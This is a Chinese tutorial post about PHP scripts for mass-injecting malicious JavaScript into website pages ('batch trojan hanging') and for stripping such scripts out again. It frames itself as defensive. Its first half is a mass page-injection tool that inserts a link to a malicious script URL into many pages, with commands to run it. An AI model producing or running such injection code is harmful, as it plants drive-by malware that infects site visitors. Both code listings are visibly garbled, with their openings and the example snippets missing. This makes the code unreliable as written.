为了防范网络黑客的攻击,网站管理员需要了解网站被挂马后的处理方式。一般在PHP语言下,网站被挂马的原因是服务端的文件有漏洞,或者被管理员账户密码泄露,网站的代码造成的后果就是在用户请求页面时,程序会在页面HTML代码中嵌入一个恶意脚本或链接,使得用户在访问页面时会自动执行恶意脚本或链接,从而感染用户的电脑或手机。下面我们将为您介绍如何通过PHP代码来批量挂马和清马。
批量挂马代码
- 首先,使用以下命令创建一个新的PHP文件批量挂马:
shell
vi hack.php
- 写入以下代码,获取目标网站HTML页面并向其中插入恶意JavaScript代码:
```php
\n"; $js .= "var link = document.createElement('a');\n"; $js .= "link.href='".$shell_url."';\n"; $js .= "document.body.appendChild(link);\n"; $js .= "\n";
// 将生成的JavaScript代码插入到目标网站页面中
$html = str_replace("",$js. "", $html);
$handle = fopen($url, "w");
fwrite($handle, $html); // 写入添加恶意链接的页面代码
fclose($handle);
}
?>
```
以上代码中,$urls
是包含目标网站URL链接的txt文件,$shell_url
是恶意JavaScript链接。代码中首先读取URL列表文件,然后循环遍历每个URL链接中的页面,将恶意代码插入到HTML中,最后将修改后的HTML页面写回到服务器中。
- 运行挂马脚本
hack.php
,执行以下命令:
shell
php hack.php
运行后,PHP脚本会根据 urls.txt
文件内的URL信息,将恶意脚本插入到每个HTML页面中。
示例:我们将 urls.txt
文件设置为包含两个URL链接:
https://example.com/page1.html
https://example.com/page2.html
运行脚本后,PHP会替换每个HTML页面文件中的 </head>
元素标签下部分,使用以下代码将恶意链接插入HTML页面中:
```html
```
批量清马代码
- 首先,使用以下命令创建一个新的PHP文件批量清理马:
shell
vi clean.php
- 写入以下代码,用于批量清理所有PHP文件中的恶意脚本:
```php
.*?<\/script>/si", "", $file_contents);
// 将处理后的内容写回到文件中
file_put_contents($file, $cleaned_contents);
} ?> ```
以上代码中,首先定义了 search_files
方法用于递归查找目录下符合条件的文件,然后定义了 $start_dir
文件起始路径和 $regex_pattern
要查找的文件后缀,最后通过正则表达式匹配所有包含恶意脚本的PHP文件,将里面的脚本部分删除并保存修改后的文件。
- 运行
clean.php
脚本,执行以下命令:
shell php clean.php
执行该命令后,PHP会查找包含指定后缀的PHP文件,并将其中的恶意脚本删除。
示例:有一个被挂马的PHP文件 foo.php
,既包含正常PHP代码也包含恶意代码:
```php
```
在运行清理脚本之后,上述PHP文件中的恶意脚本代码将被移除,只剩下正常PHP代码:
```php
...
```
以上就是批量挂马和清理马的完整攻略。
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:php下批量挂马和批量清马代码 - Python技术站